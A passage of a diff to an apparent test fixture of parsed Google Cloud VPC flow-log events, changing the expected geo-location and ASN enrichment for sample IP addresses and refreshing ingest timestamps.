"{\"insertId\":\"1ulp77rfdvho55\",\"jsonPayload\":{\"bytes_sent\":\"252397\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"260\",\"reporter\":\"SRC\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", @@ -2838,11 +2983,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33694, @@ -2920,7 +3070,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391314900Z", + "ingested": "2021-12-14T14:43:27.415187620Z", "original": "{\"insertId\":\"1ulp77rfdvho60\",\"jsonPayload\":{\"bytes_sent\":\"205787\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"265\",\"reporter\":\"SRC\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566551903Z", @@ -2931,43 +3081,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65263, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 106409, - "packets": 607, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", - "bytes": 106409, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 607, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" @@ -2978,6 +3091,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -2998,15 +3114,52 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391318800Z", - "original": "{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65263, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 106409, + "packets": 607, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "event": { + "ingested": "2021-12-14T14:43:27.415188069Z", + "original": "{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", "start": "2019-06-14T03:40:01.270990648Z", "end": "2019-06-14T03:49:56.220748025Z", "id": "1ulp77rfdvho49", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", + "bytes": 106409, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 607, + "direction": "outbound" } }, { @@ -3021,11 +3174,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33534, @@ -3097,7 +3255,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391322600Z", + "ingested": "2021-12-14T14:43:27.415188691Z", "original": "{\"insertId\":\"1ulp77rfdvho4t\",\"jsonPayload\":{\"bytes_sent\":\"61242\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", @@ -3113,11 +3271,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 49680, @@ -3195,7 +3358,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391326400Z", + "ingested": "2021-12-14T14:43:27.415189064Z", "original": "{\"insertId\":\"1ulp77rfdvho68\",\"jsonPayload\":{\"bytes_sent\":\"248826\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49680,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"735\",\"reporter\":\"SRC\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.711043814Z", @@ -3206,9 +3369,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:11.981Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "192.168.2.117" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { "continent_name": "America", @@ -3229,6 +3422,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415189468Z", + "original": "{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:11.655143526Z", + "end": "2019-06-14T03:46:11.779780615Z", + "id": "1ulp77rfdvho5n", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -3240,22 +3443,27 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "192.168.2.117" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 36 + "ms": 219 } }, "source": { @@ -3271,30 +3479,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391329800Z", - "original": "{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:11.655143526Z", - "end": "2019-06-14T03:46:11.779780615Z", - "id": "1ulp77rfdvho5n", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65321, @@ -3308,6 +3504,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415189932Z", + "original": "{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.843986502Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "1ulp77rfdvho5l", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -3319,46 +3525,6 @@ "iana_number": "6", "packets": 594, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:11.981Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 219 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391334100Z", - "original": "{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.843986502Z", - "end": "2019-06-14T03:49:56.312105537Z", - "id": "1ulp77rfdvho5l", - "category": "network", - "type": "connection" } }, { @@ -3373,11 +3539,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33524, @@ -3449,7 +3620,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391338900Z", + "ingested": "2021-12-14T14:43:27.415190464Z", "original": "{\"insertId\":\"1ulp77rfdvho65\",\"jsonPayload\":{\"bytes_sent\":\"4614\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"58\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", @@ -3547,7 +3718,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391344Z", + "ingested": "2021-12-14T14:43:27.415190856Z", "original": "{\"insertId\":\"1ulp77rfdvho4b\",\"jsonPayload\":{\"bytes_sent\":\"50379\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60112,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"130\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:14.031541248Z", @@ -3569,11 +3740,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -3645,7 +3821,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391348500Z", + "ingested": "2021-12-14T14:43:27.415191264Z", "original": "{\"insertId\":\"1ulp77rfdvho4m\",\"jsonPayload\":{\"bytes_sent\":\"200417\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"250\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", @@ -3661,11 +3837,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33524, @@ -3743,7 +3924,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391353Z", + "ingested": "2021-12-14T14:43:27.415191673Z", "original": "{\"insertId\":\"1ulp77rfdvho5t\",\"jsonPayload\":{\"bytes_sent\":\"30233\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"37\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", @@ -3765,11 +3946,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -3841,7 +4027,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391357100Z", + "ingested": "2021-12-14T14:43:27.415192066Z", "original": "{\"insertId\":\"1ulp77rfdvho50\",\"jsonPayload\":{\"bytes_sent\":\"160693\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"237\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2